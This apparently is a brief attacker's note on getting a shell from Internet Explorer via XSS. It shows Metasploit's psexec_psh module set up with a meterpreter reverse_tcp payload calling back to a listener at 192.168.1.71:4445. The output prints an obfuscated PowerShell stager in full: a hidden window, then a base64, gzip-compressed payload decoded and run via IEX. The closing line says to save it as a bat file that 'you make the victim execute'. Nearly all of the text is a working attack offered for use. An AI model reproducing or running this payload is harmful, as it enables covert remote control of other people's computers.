Open shell via XSS (internet Explorer)

Even better, open reverse connection.

 > show options

> show options

Module options (exploit/windows/smb/psexec_psh):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   DryRun                true             no        Prints the powershell command that would be used
   RHOST                 192.168.21.1     yes       The target address
   RPORT                 445              yes       Set the SMB service port
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             WORKGROUP        no        The Windows domain to use for authentication
   SMBPass                                no        The password for the specified username
   SMBUser                                no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.71     yes       The listen address
   LPORT     4445             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic




 > exploit

[*] Started reverse handler on 192.168.1.71:4445
[+] "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAB8HPlYCA7VWa4/aOBT9PJX6H6IKiUSlJDB0XlKldYDwGGCAQBigqPIkTvDgxEzi8Or2v+8NhHlsZ3a7u9oIFD/utY/PPdc3bhzYgvJACidjPyhK39+/O+niEPuSnInEwG4a56c5KWNX1ka/ehFaZ8rJCZhkvGK130GrJkZC+iLJU7RcVriPaTC7uirHYUgCcejna0SgKCL+HaMkkhXpd2k0JyH5dHN3T2whfZcy3/I1xu8wS822ZWzPifQJBU4y1+I2ThDmzSWjQs5+/ZpVpp8Ks3z1IcYskrPmNhLEzzuMZRXph5JsONguiZxtUzvkEXdFfkSD02J+GETYJR1YbUXaRMy5E2UVOAz8QiLiMJCeHytZ52AlZ6HZDbmNHCckETjlG8GKL4icCWLGctJv8jQF0Y8DQX0C84KEfGmScEVtEuXrOHAY6RN3JnfI+nj2X3WSnzuBVVeESg4C9DbaNndiRg4LZJWf8T7GVoHnZXyBkR/v371/5x6V4XxbPJcFtE6m+zYBuHKXR3Rv9kXSclIbdsSCh1voZgZhTJSZNE2iMZ3NpAzZrvWgtXQuqv1l7u11CkenxKXZ1DowNrU4dWbgkwYss9oYVNNZ+axwt59/W4AV4tKAVLYB9ql91Jj8WhyIy8j+zPmjWQfQydl0gjgVwoiHRUJpTpr+7Fb1qXj01WPKHBIiG2IZASoIs/ISzCFKcrYRtIkPpB36WYiHC8omR+tUzdvj7kkfjLJlhqMoJ3VjSC07J5kEM+LkJBRENJ1CseD7ZvYJbjtmgto4EsflZsqf+Uz3LfMgEmFsQzyBg4G5JDbFLKEkJ9WpQ/StSb3j/tlXCSljxmjgwUorCAiMJESYIlFJCFBfKELJm0Q0/CUjPtjuc95g2IMMTxNkLy/sESf7FuJjBhzknnB0JOcZXgi8ybjISRYNBVwhCd97mf03PM9ukRfIyiFJYyYfU2uqb0WSERk/2BSLcSLflLo9UaEAkoyQ+zqOyFnJFCFQKH9Qb2gZwTNuBKxt6wtaQGtaaLThP6SnDV45d66b93U1rGzmLmpEjXa9W+nV66VV07RKwqw2xHW3IdrV2/t7E9X7w7GYNFB9QLXFuLRbNunObCFnvFHPdvpuremb3b3nuOOK63rnrtkvfDZoa1Tu6VoRtyrVuDXS17pWiqp0Xe/RYW/RNMTd2GJ46KrebeES000rvLcKvL1rIFSbn9q7pmvV5m1nO66rl6PSAlURKgdVy9D59VgPUVe1sGfx9bWn94teGemGQ8mkNzT0Xs/Q0bB2/1C5VD3wvcVzfWQV6WR5259D3wAI16pWajhkx8c9IKnGEfb6YOOVi/bcBZvKR6R/7PCoiBc6RzrYGJMHwDVeGl0G84NhkSOLdW4xak22hqoWxt0Sqmt0VPNQsiT29B5G0aqyq6gFy+HO6HNn7KrWLTtXK+XB0nZVVV3XK9f2pLC5uDkv6dpD2ac+uys66uXwQg/gZN2V5/RG5/1NZ3sH+w1V1fqQqAfkk4njZrF+WhysmKU/08Rb5aGNw2iOGWgFLvxjMhs8NNKLu8tp4iHLaWlfkDAgDOogVMqj9hFj3E5qSXLJQxk7FJcZ5PIQmqfFV1uK9GioPNWW49DV1QRgQi4dxJ1vkcAT85y2OdU0qBDapqTBgX/9cGW+3MrpYrmkxrzg6Wkftt9HSfIr49eD2rpZE/j/pjFN7jm8nL+h8WnsL2Z/iVot95KCn6ZfDvwjtv8FByNMBdiacEkxcqior1KRiufZ18hjmEAdbvokH4g3sfjUgS+VPwAotmIxnQoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"

the bat file you make the victim execute is the payload above without double quotes.